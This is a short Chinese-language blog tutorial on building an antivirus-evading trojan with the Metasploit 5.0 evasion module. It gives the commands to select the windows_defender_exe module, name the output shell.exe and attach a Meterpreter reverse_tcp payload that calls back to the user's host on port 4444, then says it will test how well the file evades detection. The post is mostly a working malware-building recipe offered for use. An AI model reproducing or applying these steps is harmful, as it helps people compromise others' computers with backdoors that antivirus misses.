搜索

前言

Metasploit 5.0的时候更新一个Evasion模块,这个模块能非常快捷的生成反杀毒软件的木马,注意!低于5.0以下的版本是没有Evasion模块的,所以需要手动更新Metasploit

Metasploit更新

如果是使用kail的同学就直接使用msfupdate就能进行更新,如果是使用别的系统的小伙伴就请进入到Metasploit目录下面的bin目录下面,运行msfupdate

利用

打开metasploit

查看evasion模块

这里我们选择第五个模块

use windows/windows_defender_exe

查看需要配置的参数

show options

可以看到只有一个文件名的参数可以配置,我们就修改为shell.exe吧

紧接着我们要配置回显payload

set payload windows/meterpreter/reverse_tcp
set lhost you-ip
set lport 4444

使用exploit或者run 执行

看到回显信息我们可以看到木马存放在/root/.msf4/local/下面
我们来检测一下免杀效果

渗透测试

版权属于:Miagz
作品采用:本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。
0
查看目录

目录

来自 《利用Metasploit制作免杀木马》
评论

  1. 评论头像
    2020-03-24 回复

    很实用的小技巧,学到了

MiaGz

博主很懒,啥都没有